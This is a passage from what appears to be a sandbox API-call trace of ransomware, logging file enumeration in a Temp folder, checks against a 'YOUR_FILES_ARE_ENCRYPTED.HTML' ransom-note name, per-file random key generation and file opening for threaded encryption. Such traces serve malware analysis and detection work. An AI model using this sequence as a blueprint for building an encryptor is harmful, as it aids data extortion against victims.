0x270000 [0164.041] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0164.045] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="DE") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E5") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="75") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B9") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="BB") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="02") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="57") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="95") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="EF") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="9A") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="3F") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0B") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="92") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="51") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="32") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F8") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D3") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="BD") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="49") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="9A") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="E0") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E4") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="6D") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="AA") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="FC") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="C1") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="97") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="7C") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F5") returned 2 [0164.046] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="7A") returned 2 [0164.046] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="09") returned 2 [0164.046] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="5C") returned 2 [0164.046] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif" [0164.046] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.046] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0164.046] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d857f10, ftCreationTime.dwHighDateTime=0x1d7d72f, ftLastAccessTime.dwLowDateTime=0xa3a2bdb0, ftLastAccessTime.dwHighDateTime=0x1d7e258, ftLastWriteTime.dwLowDateTime=0xa3a2bdb0, ftLastWriteTime.dwHighDateTime=0x1d7e258, nFileSizeHigh=0x0, nFileSizeLow=0x95a8, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="3xh08hMVFrSWoJ.ppt", cAlternateFileName="3XH08H~1.PPT")) returned 1 [0164.046] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt") returned 61 [0164.046] lstrcmpW (lpString1="3xh08hMVFrSWoJ.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.047] PathFindExtensionW (pszPath="3xh08hMVFrSWoJ.ppt") returned=".ppt" [0164.047] lstrlenW (lpString=".ppt") returned 4 [0164.047] PathFindExtensionW (pszPath="3xh08hMVFrSWoJ.ppt") returned=".ppt" [0164.047] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\3xh08hmvfrswoj.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0164.047] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=38312) returned 1 [0164.047] GetProcessHeap () returned 0x270000 [0164.047] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75f0050 [0164.051] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="BB") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="47") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="7D") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B4") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="86") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="4C") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="87") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="64") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D9") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E0") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E0") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="73") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="D2") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="98") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="3F") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="30") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="7C") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="43") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="92") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="08") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="0D") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6F") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="68") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F6") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="29") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2C") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="06") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="92") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="AF") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E0") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="46") returned 2 [0164.053] lstrcpyW (in: lpString1=0x7600104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt" [0164.053] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x75f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.053] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75f0050, lpOverlapped=0x75f0050) returned 1 [0164.053] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1c5020b0, ftCreationTime.dwHighDateTime=0x1d7e432, ftLastAccessTime.dwLowDateTime=0xe5480c40, ftLastAccessTime.dwHighDateTime=0x1d7e544, ftLastWriteTime.dwLowDateTime=0xe5480c40, ftLastWriteTime.dwHighDateTime=0x1d7e544, nFileSizeHigh=0x0, nFileSizeLow=0x12d64, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="7 nypZ.flv", cAlternateFileName="7NYPZ~1.FLV")) returned 1 [0164.053] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv") returned 53 [0164.053] lstrcmpW (lpString1="7 nypZ.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.053] PathFindExtensionW (pszPath="7 nypZ.flv") returned=".flv" [0164.053] lstrlenW (lpString=".flv") returned 4 [0164.053] PathFindExtensionW (pszPath="7 nypZ.flv") returned=".flv" [0164.053] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\7 nypz.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.054] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=77156) returned 1 [0164.054] GetProcessHeap () returned 0x270000 [0164.054] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.059] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="3E") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D4") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="48") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="6F") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EA") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="C2") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="78") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B6") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3A") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EE") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="46") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="CB") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="97") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="6C") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="52") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F5") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="25") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="DD") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="33") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="84") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="51") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E4") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="36") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="38") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D2") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BC") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="35") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="63") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A6") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="D0") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="42") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="5B") returned 2 [0164.061] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv" [0164.061] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.061] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.073] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11285520, ftCreationTime.dwHighDateTime=0x1d7e3e9, ftLastAccessTime.dwLowDateTime=0xdf1e05e0, ftLastAccessTime.dwHighDateTime=0x1d7e747, ftLastWriteTime.dwLowDateTime=0xdf1e05e0, ftLastWriteTime.dwHighDateTime=0x1d7e747, nFileSizeHigh=0x0, nFileSizeLow=0x154a3, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="ArGdil6.wav", cAlternateFileName="")) returned 1 [0164.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav") returned 54 [0164.073] lstrcmpW (lpString1="ArGdil6.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.073] PathFindExtensionW (pszPath="ArGdil6.wav") returned=".wav" [0164.073] lstrlenW (lpString=".wav") returned 4 [0164.073] PathFindExtensionW (pszPath="ArGdil6.wav") returned=".wav" [0164.073] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\argdil6.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.074] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=87203) returned 1 [0164.074] GetProcessHeap () returned 0x270000 [0164.074] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.075] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="E1") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7C") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="EC") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="C6") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="69") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="CB") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="9D") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="93") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="23") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="D1") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="A2") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="60") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E8") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="94") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="AA") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="4F") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D0") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5E") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="9C") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="69") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="C2") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="77") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B6") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="98") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F5") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="24") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D6") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A1") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="73") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="D5") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="43") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="01") returned 2 [0164.077] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav" [0164.077] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.078] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.090] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7d22c140, ftCreationTime.dwHighDateTime=0x1d7de3d, ftLastAccessTime.dwLowDateTime=0xb9c03b00, ftLastAccessTime.dwHighDateTime=0x1d7e4dc, ftLastWriteTime.dwLowDateTime=0xb9c03b00, ftLastWriteTime.dwHighDateTime=0x1d7e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x119cd, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="bUkj-n.m4a", cAlternateFileName="")) returned 1 [0164.090] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a") returned 53 [0164.090] lstrcmpW (lpString1="bUkj-n.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.090] PathFindExtensionW (pszPath="bUkj-n.m4a") returned=".m4a" [0164.090] lstrlenW (lpString=".m4a") returned 4 [0164.090] PathFindExtensionW (pszPath="bUkj-n.m4a") returned=".m4a" [0164.090] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bukj-n.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.091] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=72141) returned 1 [0164.091] GetProcessHeap () returned 0x270000 [0164.091] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.092] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="95") returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A5") returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="B4") returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="15") returned 2 [0164.092] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="0B") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="74") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="37") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="52") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="57") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="33") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="40") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="09") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E0") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="89") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="94") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="C5") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="0B") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B1") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="15") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="BD") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="EE") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="03") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="7B") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="DC") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="20") returned 2 [0164.093] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="8B") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="FB") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="82") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="8C") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8F") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="AA") returned 2 [0164.094] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="10") returned 2 [0164.095] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a" [0164.095] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.095] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.109] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91eb8960, ftCreationTime.dwHighDateTime=0x1d7e0d4, ftLastAccessTime.dwLowDateTime=0x52191820, ftLastAccessTime.dwHighDateTime=0x1d7e511, ftLastWriteTime.dwLowDateTime=0x52191820, ftLastWriteTime.dwHighDateTime=0x1d7e511, nFileSizeHigh=0x0, nFileSizeLow=0xd6b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="bUUqVBJ.avi", cAlternateFileName="")) returned 1 [0164.109] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi") returned 54 [0164.109] lstrcmpW (lpString1="bUUqVBJ.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.109] PathFindExtensionW (pszPath="bUUqVBJ.avi") returned=".avi" [0164.109] lstrlenW (lpString=".avi") returned 4 [0164.109] PathFindExtensionW (pszPath="bUUqVBJ.avi") returned=".avi" [0164.109] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.109] CreateFileW 